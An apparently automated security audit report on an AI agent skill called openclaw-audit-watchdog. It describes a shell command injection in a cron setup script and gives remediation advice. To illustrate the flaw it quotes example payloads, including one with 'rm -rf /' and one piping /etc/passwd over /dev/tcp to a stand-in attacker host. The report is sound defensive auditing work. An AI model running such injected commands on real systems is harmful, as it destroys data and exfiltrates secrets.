Trust Assessment
openclaw-audit-watchdog received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 1 high, 0 medium, 1 low, and 1 informational. Key findings: command injection via unsanitized environment variables in the cron payload (critical), data exfiltration enabled by that same injection (high), and a self-updating script that introduces supply chain risk (low).
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 53/100; all four findings listed below were raised by that layer.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Command Injection via unsanitized environment variables in cron payload. `scripts/setup_cron.mjs` builds a shell command string that becomes the `openclaw` agent's cron job payload. The `oneline` function (line 60), used to sanitize values such as `PROMPTSEC_HOST_LABEL` and `PROMPTSEC_INSTALL_DIR`, only escapes double quotes and strips newlines; it leaves every other shell metacharacter (`$`, backticks, `(`, `)`, `;`, `|`, `&`, and `\`) untouched. Because the values are interpolated inside double quotes, the shell still performs command substitution on them: setting `PROMPTSEC_HOST_LABEL='$(id > /tmp/exfil)'` (through the environment or the interactive setup prompts) yields `PROMPTSEC_HOST_LABEL="$(id > /tmp/exfil)"` in the payload, and `id > /tmp/exfil` runs every time the cron job fires. Escaping the double quote alone does not close the quote-breaking path either, given the described behaviour of `oneline`: a bare `"` in the input is turned into `\"` and stays quoted, but `foo\"; rm -rf /; echo \"` becomes `foo\\"; rm -rf /; echo \\"`, which the shell reads as a literal backslash followed by a closing quote, so the injected `rm -rf /` runs after the `cd`. Remediation: quote every user-controlled or environment-derived value with a proper shell-quoting routine (single-quote wrapping, with embedded single quotes emitted as `'\''`, or an established shell-quoting library) before it is interpolated into the command string, and additionally validate `hostLabel` and `installDir` against an allowlist of expected characters. Both values must be fully quoted before they are included in the `agentMessage` payload. | LLM | scripts/setup_cron.mjs:100 |
| HIGH | Data Exfiltration via Command Injection in cron payload. The command injection in `scripts/setup_cron.mjs` (SS-CMD-001) gives an attacker arbitrary command execution inside the `openclaw` agent's cron job, which can be used directly to exfiltrate data (the agent's environment variables, configuration files, `/etc/passwd`, or other system information) to an attacker-controlled host. For example, an injected `$(cat /etc/passwd > /dev/tcp/attacker.com/80)` would push the account list out over TCP; note that `/etc/passwd` holds account names rather than password hashes on modern systems (those live in `/etc/shadow`), and the `/dev/tcp` redirection is a bash feature, so it only works when the payload runs under bash, whereas `curl`, which the manifest already requires, would do the same under any shell. Remediation: fix the underlying command injection (SS-CMD-001) with proper shell quoting of every user-controlled input embedded in executed commands; without arbitrary command execution there is no exfiltration path. | LLM | scripts/setup_cron.mjs:100 |
| LOW | Self-updating script introduces supply chain risk. `scripts/runner.sh` runs `git pull --ff-only` against its own repository when the `PROMPTSEC_GIT_PULL` environment variable is set to `1`. `--ff-only` only refuses to create merge commits; it says nothing about who authored the new commits, so if the hosting repository, a maintainer account, or the network path to it is compromised, malicious commits are fetched and executed on the agent at the next run. Remediation: require manual approval for updates, or verify them cryptographically before fast-forwarding: fetch first, check the fetched tip with `git verify-commit` (or `git verify-tag` for signed release tags) against a pinned trusted key, and only then `git merge --ff-only`. If automatic updates are essential, keep the repository locked down and sign all commits or tags so integrity and authenticity can be checked on the agent. | LLM | scripts/runner.sh:18 |
| INFO | Extensive use of powerful system binaries. The skill executes several powerful binaries: `bash`, `node`, `openclaw`, `sendmail`, and `git`. The `skill.json` manifest declares only `bash` and `curl` as required, so `node`, `sendmail`, and `git` are undeclared implicit dependencies. Together these grant broad system access, and any flaw in the skill's command construction or input handling is amplified by what the tools can do. Remediation: declare every required binary in the manifest so reviewers and the dependency layer see the real footprint, invoke each with least privilege, and review every command construction and input sanitization path. `openclaw` itself should enforce strong security boundaries and input validation to keep its attack surface small. | LLM | skill.json:40 |
Full report: https://skillshield.io/report/bf7ea349a8cd6ad6
Powered by SkillShield